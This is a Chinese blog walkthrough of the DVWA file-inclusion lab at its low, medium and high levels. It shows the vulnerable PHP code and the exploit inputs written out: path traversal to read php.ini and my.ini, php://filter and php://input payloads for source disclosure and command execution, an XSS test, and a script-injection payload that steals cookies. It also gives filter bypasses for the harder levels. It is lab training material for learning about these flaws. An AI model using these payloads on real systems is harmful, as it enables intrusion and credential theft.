dvwa-file inclusion

总结了dvwa中的文件包含漏洞的关卡

Low

代码复现如下:

1
2
3
4
5
6
7
8
9
10
<?php

if(isset($_GET['page'])){
include($_GET['page']);
}
else{
header("location:?page=include.php");
}

?>

从源代码可以看出,当用户没有GET一个page值时,会自动给page赋值一个include.php,而这个include.php中就包含了三个文件给用户选择,希望用户能点击这三个文件进行文件包含

但是从攻击者的角度来看,当然不会乖乖的去点击这三个文件,因为page参数是不经过过滤,我们可以读取我们想要读的文件,前提是文件存在对应的目录。

我们先要清楚,如果包含的是php文件,则正确包含,如果不是php文件,则原封不动的将文件内容输出到页面上

这里说的php文件不一定是后缀名是php的文件,任何后缀文件只要里面包含了符合php语法的语句,通过文件包含函数include后,里面合法的代码就会被执行

举个例子,我们先在目录中创建一个phpinfo.txt

文件内容是:

1
<?php phpinfo(); ?>

然后给服务器GET一个page值为phpinfo.txt

发现正常显示phpinfo信息,由此可知,只要文件内容符合php语法规范,那么任何扩展名都可以被php解析

再将phpinfo.txt信息修改为非php语法规范的语句

同样给服务器GET一个page值为phpinfo.txt

发现暴露其源代码

所以我们可以利用这个特性,查看一些配置文件信息

首先要想查看文件信息,必定要弄清楚目录

我们先随便输入一个xxx.php

发现这个文件不存在,报错了,但同时把文件的绝对路径爆出来了

知道文件路径后,我们就可以查看一些配件文件,比如php配置信息

输入http://127.0.0.1/demo/file-inclusion/low.php?page=C:\phpStudy\PHPTutorial\WWW\dvwa/php.ini

或者输入../../../../../../../phpStudy/PHPTutorial/WWW/dvwa/php.ini

输入这么多的../是为了保证能回到根目录下

再看一下mysql配置信息

输入http://127.0.0.1/demo/file-inclusion/low.php?page=C:\phpStudy\PHPTutorial\mysql\my.ini

还可以使用php内置封装协议来读取php文件

输入?php://filter/read=convert.base64-encode/resource=include.php

发现一段被base64加密过后的php源代码,经过解密后就可以得到php文件原本的代码

再用php://input写入php命令,前提是allow_url_include选项要为on

在burpsuite中提交数据

发现提交的命令被执行了,那么是不是可以像xss一样提交恶意的脚本代码呢

我们提交

1
<script>alert(‘xss’)</script>

发现成功执行

我们再看看可不可以窃取cookie

输入

1
<?php echo"<script src='http://127.0.0.1/demo/xss(stored)/cookie.js'></script>"  ?>

发现成功跳转到steal.php

成功窃取到cookie值

Medium

代码复现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

if(isset($_GET['page'])){
$page=$_GET['page'];
$page=str_replace(array('http://','https://'),'',$page);
$page=str_replace(array("../","..\""),'',$page);
//echo $page."<br>";
include($page);
}
else{
header("location:?page=include.php");
}

?>

可以看出对http:// 和https://,../和..\有过滤,但是因为是str_replace函数,所以双写即可绕过

而且如果读取绝对路径的话,就没有什么影响

先看一下当前php文件的绝对路径

复写../构造路径读取php配置文件

读取mysql配置文件

使用php内置协议读取文件

任意命令执行

High

代码复现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

if(isset($_GET['page'])){
$page=$_GET['page'];
if(!fnmatch('file*',$page) && $page != 'include.php'){
echo "ERROR:File not found";
exit;
}
include($page);
}
else{
header("location:?page=include.php");
}

?>

Fnmatch函数作用是在page值中搜索指定模式,指定必须以file开头的字符串才返回true,而我们要执行include,就必须不让if语句执行,所以page值必须以file开头

看似完全限制了,但是我们可以用file协议进行读取文件

文章作者: Somnus
文章链接: https://nikoeurus.github.io/2018/07/11/dvwa-file-inclusion/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Somnus's blog